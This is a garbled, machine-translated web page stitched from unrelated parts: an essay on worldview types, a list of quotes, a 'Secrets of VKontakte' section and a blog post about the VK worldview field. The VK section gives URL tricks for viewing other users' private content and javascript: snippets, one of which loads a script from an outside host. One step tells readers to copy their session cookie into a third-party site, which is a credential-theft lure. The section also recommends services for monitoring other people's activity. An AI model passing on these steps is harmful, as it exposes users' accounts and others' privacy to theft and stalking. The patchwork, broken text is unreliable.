Types of worldview: what they are and their connection with life goals. What is a person’s worldview - its forms, types and principles of formation

Conventionally, all types of worldview are divided into two groups: socio-historical types and existential-personal types.

Already described earlier. You just have to refresh your memory: a worldview is a set of concepts, beliefs, values ​​about life, about the person himself, about his position in life.

Types of worldview and life goals

Depending on what worldview we use, we set the corresponding life (), and, accordingly, according to the type of our understanding of the world, we choose a way to realize such a goal.

Unhappy and unsuccessful people usually take the goal from one worldview context, and the path to it from another. For happy and successful people, the goal and the path to it are in the same coordinate system (in the same context of their worldview).

Types of worldview, historical and social

They were formed in chronological order. It is very good to understand what the difference is - knowing the history of all mankind. From the Stone Age to the present day. Each period of time reflected the principles that lay in each of these types of worldview.

Another interesting fact: humanity developed - and its thinking developed, its worldview changed. And exactly the same thing happens with the development of a child. That is, in essence, every person, growing up, develops his own worldview by choosing appropriate goals.

Archaic type of worldview

This is humanity’s earliest understanding of the world, of man himself in it.

It is characterized by the fact that realism and fantasy are not separated from each other. These two concepts merged in the form of early beliefs: animism, fetishism, totheism. There is no clear division from your “I” and the world around you. As such an understanding, “Soul” does not exist at all. At the same time: all living things are endowed with life, like humans: from stone to the sun.

Life goals are not formed consciously: it is to please oneself and other animate beings (sacrifice, rituals, idols ....)

Mythological type of worldview

At this point in history, there is a clear separation of “oneself” from the world around us. And if there is an “I,” then there is a “He,” whose actions and thoughts may not coincide with mine. From such views, confrontation (confrontation) already occurs.

This is the era of cults and pantheons of gods. Just as life itself is full of confrontation and competition for a place in the sun, so myths are born about exactly the same confrontation between the gods.

Life goals are already acquiring a clearer structure and meaning: to be with the Powerful Ones of this world, to have power... to achieve the favor of a certain god or person...


Even more her division of the world. What is this world And that world. The concepts of soul, spirit and body appear. To God is God, to Caesar what is Caesar's.

The concept of faith appears - in the invisible, without critical analysis of the latter. Ideas common to all religions: about God’s creation of the world, about the concepts of good and evil, about the consequences of not following certain rules of behavior.

Life goals - according to the concept of faith that a person professes - are “correct” in its understanding of actions and thoughts.

Philosophical type of worldview

With an increase in knowledge about the person himself and the world around him, a collapse occurs (critical mass), when this knowledge needs to be rethought. This is how various schools of philosophy are formed.

If the knowledge is reinterpreted in the context of such a school, then they believe that the philosophy is the same, but is developing... If the contradictions with the old school are obvious, a new philosophical movement is formed.

Life goals in this context are personal growth, self-development, self-actualization, search for truth...

Exponential-personal types of worldview

It is formed according to the maturation of the person himself. From uncritical, not separating yourself from your mother to a teenage existential crisis... plus the external environment of influence is imposed.

The basis of each person’s worldview is a collective image from many types of worldviews. This can be either a harmonious combination of philosophy, faith and traditions, or without much criticism, various worldview laws are perceived as axioms.

Take the previously described types - mix something from below into a pile, and there you have it modern man such a person.

The goals will be different depending on which worldview concept dominates... The most interesting thing happens: when the goals are on one plane, and the paths to them are on another...


Dogma is not critical, but conscious adherence to rules and laws, according to some worldview.

Pursuing goals - according to dogmas and rules.


Reflexes are the subconscious following of certain rules. If in dogmas the mind still takes part, in reflection it is following the principles and rules without the participation of consciousness, reflexively, impulsively.

In this situation, reflection plays an inconspicuous but, sometimes, very significant role.

Choosing the right goal, according to the type of worldview

Many concepts from the listed types are firmly woven into our consciousness.

Some examples - then and now.

Archaic type: before - open worship of idols (all living things), now - baubles, beads, talismans... bringing good luck, the concept of many new people is “the living universe”...

Mythological type of worldview: earlier - worship of the pantheon of gods: Zeus, Veles, Iris..., now - from challing (receiving sacred knowledge from unearthly forms of being) to the influence of the stars, the concepts of fate and karma, implicit and subtle worlds.

If a person fails, he cannot achieve success, here is the answer why this happens:choosing a goal not from one’s own type of worldview.

The fact is that changing your vision of the world is quite difficult, but choosing the right one that corresponds to the type of worldview is quite simple. It will only bring its own goal! From other people's goals, not your own, you will only be unhappy...

Good luck to you and choosing the right goals!

Maybe because “atheism” is not a worldview at all? That is, atheism is simply a position in which a person denies the existence of God in different ways: through the fact that his existence has not been proven or through the fact that his non-existence has been proven.
But on a larger scale, atheism is not part of the worldview. Usually atheists attribute to themselves some kind of critical thinking and rationality of the mind. Of course, a person can attribute this to himself (if only it were deserved), but at the same time, atheism itself does not stand on this. He solves one single fundamental question, which concerns the existence of God and that’s all.
So what happens then? Throughout their entire life, do people only adhere to the point of view that there is no God? What about other values? And now we come to the point that religion is still the bearer of certain values, the establisher of prohibitions and permissions. And at the same time, this does not mean that religion is the only carrier of values, oh no. Just put it this way historically, that any religion developed values ​​when there were simply no other worldviews, and therefore we can talk about an atheist who adheres to Christian values ​​or Buddhist, for example.
And at the same time, in contact it is possible to choose “secular humanism” as an opportunity to show what value guidelines a person adheres to. Another thing is that I can’t really say much about secular humanism, since I haven’t studied this line of thought (so to speak). But, sir, you can always write or attribute your worldview to VK)

“It’s just that historically, any religion developed values ​​when there were simply no other worldviews, and therefore we can talk about an atheist who adheres to Christian values ​​or Buddhist ones, for example.”

You can find the answer to these words in Nietzsche:
“All the work of the ancient world is in vain: I have no words to express the enormity of it. - And considering that this work was only preliminary work, that with the granite of his self-consciousness only the foundation was laid for the work of thousands of years, - the whole meaning of the ancient world is in vain! Why the Greeks? Why the Romans? - There were already all the prerequisites for a scientific culture, all the scientific methods, the great incomparable art of reading well was firmly established - this prerequisite for the tradition of culture, for the unity of science in alliance with mathematics and mechanics; was on the best path - the understanding of facts, the last and most valuable of all understandings, had its own schools, had already centuries of traditions. Is it clear that everything essential was found so that one could begin to work: methods, I repeat ten times, this is it! is the most essential, and at the same time the most difficult, that which habit and laziness most stubbornly resist. All the bad Christian instincts are still in us, and it took enormous self-compulsion to win a free view of reality, prudence in action, patience and patience. seriousness in the smallest things, all honesty of knowledge - and all this was already there! it was already more than two millennia before that! Add here some subtle tact and taste! Not like brain training! Not like a “German” education with vulgar manners! But like the body, like gestures, like instinct - in a word, like reality! It's all in vain! In just one night it became just a memory! - Greeks! Romans! Nobility of instinct, taste, methodical research, genius of organization and management, faith, will for the future of people, the great affirmation of all things embodied in the imperium Romanum and obvious to all senses, a great style that has become not only art, but reality, truth, life ..."

The breadth of our worldview is measured by the size of the hole through which we look. and it doesn’t matter how wide we open our eyes.

Love is the only thing in nature where even the power of imagination cannot find the bottom...

We are given a soul and a body, a world and the contours of destiny. Everything is given... But in black and white, and we color it!

About the sleeping and awakened worlds
The sleeping and the awakened live in the same world. The worlds of both are completely different.

No matter how much you allow life to fill the voids in you, you realize that the world is full of wealth that you never dreamed of. That there are many joys in life. More than you think. And many of them are free.

Learn to be happy with what you have and don't worry about what you don't have.

A stunningly successful outer life begins with a feeling of stunning success on the inside...

Happy is he who falls headfirst. Peace for him, at least for a moment, but another...

Everything in the world is relative.

Everything will pass - and the seed of hope will not sprout, everything that you have accumulated will be lost for a penny, if you do not share it with a friend in time - all your fortune will go to the enemy.

One day, seeing Einstein nailing a horseshoe over the door, his students asked:
- Professor, you said that you don’t believe in horseshoes?
- Yes, of course, but they say it brings good luck even to those who don’t believe in it.

The most powerful word is WE...

When you change your point of view, you see things you haven't seen before.

Your own life is a reflection of your own thoughts. These are not bad people. It's not all bad in life. These are not your boyfriend's girlfriends whores. And it’s not all the men around who are assholes. It's all yourself. The world is not an illusion. The world is your own mirror.

Appreciate what is available to you.

If you live according to the highest laws of your soul, the result of the game does not matter. No matter how it ends, it will end right.

A good person will see good and bright even where there is very little of it... and an evil person will turn good and good into darkness...

But the expanded world must narrow somewhere, and here - here is the end of perspective...
Brodsky, Joseph

Man is not created for happiness. There are things more important than happiness. The search for truth is almost always very painful.

Our life today is what we thought about yesterday.

The angle of worldview is equal to the angle of mood...

The main thing is to jump off the cliff - along the way you will definitely grow wings.

We will never establish harmony with the world around us until we come to terms with ourselves.

“There are things that people cannot understand. Nobody wants to deal with such things. People look at what does not fit into their worldview as evil. Let the incomprehensible remain so. Is this bad?..”

The only advice I listen to is not to listen to anyone’s advice!

It is difficult to accept something that changes the picture of the world. It is impossible to accept what destroys it. It's not cheap to buy a new one. Only a creator can create his own.

People are stupid not when they are not smart and not well-read, but when they are persistent in their delusions.

You can’t show what you don’t see yourself, you can’t see what you don’t want to see.

“Only poets and dreamers can make the world a better place, even if this whole world fits in a hole called the Metro. »
Sergey Antonov

In order to change the world, sometimes it’s enough just to change your worldview...

To love the whole world... - some will consider it naivety, others stupidity, others the breadth of the soul, and only the lover will wonder how it is possible not to love the world!

The boundaries of my language mean the boundaries of my world.

People smiled during the war, but you don’t want to live sitting on the couch.

Not from every place and not in every position, you can see the entire “stage” and the entire “performance”.

In the struggle between yourself and the world, stay on the side of the world.

Talent without a worldview is a building without a foundation.
Irina Chizhova.

You need to live in the PRESENT. There is no point in worrying about the past, it no longer exists, and endlessly dreaming about the future - it has not yet arrived. Learning to enjoy the present is difficult, but possible.

What is the most important thing in life? Live here and now, without hoping that tomorrow will be better.

Tomorrow will never come, it will always be today, here and now!

And pain is given to us not for suffering, but so that we find Love within ourselves...

The world is cruel - even when we step we crush millions of microbes, so let's live together, otherwise we will crush each other!!!

It doesn't matter WHAT you see, it matters HOW you look at it.

“Every worldview is based on faith and facts. Faith is more important, but facts are stronger. And if facts begin to undermine faith, that’s a disaster. We have to change our worldview. Or become a fanatic. To choose from. »
Boris Strugatsky.

For some reason it seems to me that the world is not structured at all the way you think... But the way I think))

“The meaning of the current worldview has become the opposite: what was bad has become good, what was good has disappeared...”
Yuryev Alexey

A loving heart feels good only when it feels good for the one it loves...

Once P. Picasso at an exhibition of children's drawings said, “Once upon a time I could draw like Raphael, but it took me my whole life to learn to draw like them!”... children look at the world with an open, clear gaze. Let's learn from them ;)))

The wisest people are old people and children... The former have already received their “tests”, the latter have not yet had time to think about this issue...

Look at the world from a different angle! Perhaps you will see something new for yourself!

The world has deteriorated so much that when a pure, sincere person is in front of you, you look for a catch in it

When a person says that money can do anything, know: he doesn’t have it and never has...

Only space and movement are real, everything else is relative.

It’s amazing: how one person who accidentally enters your life can radically change it, radically change your environment, your worldview, your habits, feelings, your inner world, thoughts, actions... Just one person...

I will say more, roles sometimes shape one’s worldview.
Mironov Evgeniy Vitalievich

We are all united only by Love, the rest can only be similar or very similar... God is Love... And the more Love we have, the closer we are... “Close in spirit”... The more Love in a person, the more unity with other people is perceived, with everything around...

I don’t want to take EVERYTHING from life!!! Why am I in so much trouble? I take only the BEST!)))

Statuses about worldview

Attention! By using the tips below, the user agrees that he himself takes responsibility for the likely consequences of their implementation. The information is taken from available Internet sources, and the website administration is not responsible for the performance of the described scripts and methods.

Secrets of VKontakte:

1) View closed pages of VKontakte.ru

The methods work with those pages where there is no prohibition on privacy settings. This is the so-called “hacking” of VKontakte, based on the address code of the page. By substituting the id (identifier) ​​of a suitable user instead of the “0” sign, it is possible to view the private content of his page:

  • http://vkontakte.ru/photos.php?act=user&id=0000 - photos in which a person is tagged (where 0000 is the user id);
  • http://vkontakte.ru/video.php?act=tagview&id=0000 - videos in which a person is tagged (0000 - user id);
  • http://vkontakte.ru/photos.php?id=0000 - photo albums (0000 - user id);
  • http://vkontakte.ru/video.php?id=0000 - video recordings (0000 - user id);
  • http://vkontakte.ru/notes.php?id=0000 - notes (0000 - user id);
  • http://vkontakte.ru/groups.php?id=0000 - groups (0000 - user id);
  • http://vkontakte.ru/audio.php?id=0000 - audio recordings (0000 - user id);
  • http://vkontakte.ru/rate.php?act=vote&id=0000 - page rating (0000 - user id);
  • http://vkontakte.ru/apps.php?mid=0000 - applications (0000 - user id);
  • http://vkontakte.ru/questions.php?mid=0000 - questions (0000 - user id).
  • 2) Watching videos through comments on VKontakte.ru

  • private user video: http://vkontakte.ru/video.php?act=comments&id=0000 (where 0000 is the user id);
  • private group video: http://vkontakte.ru/video.php?act=comments&gid=0000 (0000 - group id);
  • viewing the user's photo album: http://vkontakte.ru/photos.php?act=comments&aid=0000 (0000 - album id; usually works with albums that were made before the New Year 2009).
  • 3) Viewing private photos in which the Vkontakte.ru user is tagged

  • To do this, you need to open any unlocked photo in which the user is tagged, click on “Enable accelerated photo viewing mode” and then go to the sacred photo.
  • 4) Change the date of birth on the VKontakte website to any day, month or year

  • download and install browser Opera;
  • in contact press on edit.” next to the “My Page” button;
  • press Ctrl+F3;
  • scroll the opened code down to the list with lines of type 1;
  • in the found piece, change both numbers 1 in line 1 to the same desired number;
  • scroll down a little more to the list of years and in 1996 change both numbers 1996 to the same desired numbers;
  • look up and click the “Save changes” button;
  • click on the tab with the page for editing the contact page and select just produced numbers from the lists;
  • press “Save”;
  • go to your page and make sure everything works.
  • Attention: Such actions may not work the first time!

    5) Download music from Contact (Vkontakte.ru)

  • Open page with audio recordings
  • Copy the following into the address line:javascript:functionoperate(konfuze,loves,you,all-,xP)(you=you.toString(10);while(you.length


  • REMOVE SPACES and press Enter. Now, when you click on the play button, the download link will be shown instead.
  • Right-click on the link and select “Save link as... (save link as...)”. Some browsers allow you to simply click on a link. From time to time it is possible to click on a link and, after downloading the melody, select “File -> save”.
  • Method 2 (more difficult):

  • Select button Play corresponding entry, right-click, select “View the initial code of the selected fragment.”
  • Find the text: nclick="return operate(6035468,1094,28944,"18570a58a1",97);", understand "18570a58a1";
  • Press Play.
  • Right-click anywhere on the page, select DownloadHelper-> 18570a58a1.mp3.
  • On the page where there are audio recordings that need to be downloaded, copy this line into the browser address line:
    javasc ript: function operate (id, host, user, file, dur, wall) ( var str = "Download
    "; mydoc = window.open(); mydoc.document.write(str); ) alert("Patched!");
    // remember to remove spaces
    Press ENTER.

    Now, when you click on the button to play an audio recording in a contact, a new (!) window will open with a “download” link. To download, you need to right-click on the link and select “Save As”. To listen, you can simply follow the link. Also, after following the link and finishing downloading, the “Save As” item in the File menu is activated in some browsers.

    Method 4: Use the website audiovkontakte.ru

    See also: universal methods that allow you to save music, videos from other websites as well(website).

    6) How to download a video from Contact (Vkontakte.ru)

  • Open the page with the video clip;
  • Paste into the address bar: java script:(function())(var s=document.createElement("script"); s.src="http://xantorohara.jino-net.ru/videovkontakte/videovkontakte.js"; s .type="text/javascript"; document.getElementsByTagName("head").appendChild(s ))();
  • Remove spaces;
  • Enter.
  • 7)How to find out who removed you from the list of friends on Vkontakte.ru

  • Open the Friends tab: http://vkontakte.ru/friend.phр;
  • Press CTRL+A (i.e. select all);
  • Create an EXCEL file on your desktop;
  • Copy the contents of the buffer to this file and save - that’s it, a powerful database has been created!
  • When you suspect that someone has deleted you, then do steps 1 and 2 of this method and open that file. After:

  • Insert the contents next to the already stored data, but only in the same line where the beginning of the previous one comes from, i.e. in that case it starts with A1 or B1, then insert it in D1, F1)
  • Match the lines by scrolling to the end of the file. Where the columns “flowed”, the one who removed you from friends “sat” there.
  • 8) How to find out who left a worldview about you on Vkontakte.ru

  • Send a link in response to a world view: http://vkontakte.ru/matches.php?act=a-sent&to-id=0000&dec=1
  • (0000 is your ID).
  • A person clicking on a link automatically responds to this offer.
  • Attention: Applications must be enabled!

    9) How to upload a picture instead of graffiti on Vkontakte.ru

  • http://vkontakte.ru/profile.php?id=555777, where after id= comes the number of this person.
  • Go to the link http://mask-zona.unitedlegion.ru/vkontakte.php
  • In the “Person ID” column, enter the person’s ID N
  • Column "File" - ...
  • A problem that causes difficulties for almost everyone:

    Go to your VKontakte page and enter in the browser line: javasсript:document.write(document.cookie); (browser line: where it says http://vkontakte.ru/idbla blah blah)

  • Copy everything that is highlighted later and move on to the next point;
  • Paste everything that was copied into the window on the graffiti replacement page (where it says “Copy here what you received”);
  • Click the “Next” button.
  • 10) How to stay on VKontakte and be offline

    To be on a website offline, the most important thing is to ignore the “My Page” tab and not enter the main pages of other users. In other words, the following are available: messages, announcements, bookmarks, video files, etc., not counting individual user pages. To do this, you need to put a page with news (anything other than the original one) in your browser in “Bookmarks” (“Favorites”) and enter via this link, in which case you are not in the mood to talk.

    11) How to remove the last name on VKontakte.ru

    This may be the case, only by registering again on vkontakte.ru. When registering, everything is as usual, except for filling out the “first name” and “last name” fields, then insert the code into the address line: javascript: this.disabled=true; document.regMe.submit(); and press “Enter”.

    12) How to make a status in a VKontakte.ru column

    For Opera browser. Go to your page, right-click and select “Start Code” (Ctrl+U) in the context menu. Then press “Ctrl+F” and paste the code in the search menu that opens:

    and change it to: textarea id="edit-activity-text" name="edit-activity-text" onblur="return activity-editor.blur();"> and click “Save”.

    13) How to track a person on Vkontakte.ru

    For this there is a so-called "anti-social project" SocialWatch.ru. This is a tool for monitoring the activity of social network users. It indicates at what time users appeared on websites. Also tracked: Odnoklassniki.ru, Dating Mamba, Dating - loveplanet.ru, [email protected], Rambler-dating, Dating 24open.ru, Moskva.ru.

    vkonliner.ru-online service for tracking VKontakte users, with keeping statistics of online presence.


  • vkontakte.x53.ru - secrets of VKontakte.
  • zhelezyak-a - download video/music from services that support online viewing/listening (Vkontakte, Youtube) without using special programs.
  • Additionally on the site:

  • How does vkontakte.ru work?
  • Other secrets and hidden programming abilities of the VKontakte.ru website.
  • How to delete the “activation page” on VKontakte?
  • How to delete a VKontakte microblog?
  • Many people know the social network VKontakte. But, in my opinion, it is very popular in Russia. I am also registered in this social network, although I go into it very rarely, especially lately, because it has become simply terrible and not surprisingly, now a sea of ​​schoolchildren are registered on this site.

    So, in this social network, like in any other, you can completely fill out your profile. Although I personally never fill out a profile completely, I only write minimal information about myself. Nevertheless, many people have a desire to provide as much information about themselves as possible (some are simply very open people, while others may want to meet someone).

    It turned out that many still do not know what a worldview is. Probably, most of them are schoolchildren who, instead of studying, stay on their gadgets. Especially for those who did not study at school, and for those who were simply not taught, I will explain briefly and clearly: a worldview is a person’s system of views on the world around us. And in the “worldview” column on a social network, you can either select a specific item that applies to you, or write something yourself.

    So, you can select the following items: Judaism, Orthodoxy, Catholicism, Protestantism, Islam, Buddhism, Confucianism, secular humanism, Pastafarianism (in the “life position” column, clicking “edit my page”).

    Although in fact it is not necessary to indicate any of these points, you can write something of your own, nevertheless, in addition to the religious type of worldview, there is also a scientific and philosophical worldview, and a mythological one. But that’s not even the point, you can write whatever you want, even “believe in yourself,” or even indicate part 5 of article 3 of the Federal Law of September 26, 1997 N 125-F.

    No one can force you to indicate your worldview, since “no one is obliged to report their attitude to religion and cannot be subject to coercion in determining their attitude to religion...” (Part 5 of Article 3 of the Federal Law of September 26, 1997 N 125-F), but if you want to indicate your worldview, then please - that’s your business.

    Worldview plays pretty important role in a person’s life, since it is the worldview that gives a person: guidelines and goals, methods of cognition and activity, the true values ​​of life and culture. I didn’t say anything special in this article; these are simple things that many have known for a long time. However, I hope that my article was useful.

    Video review
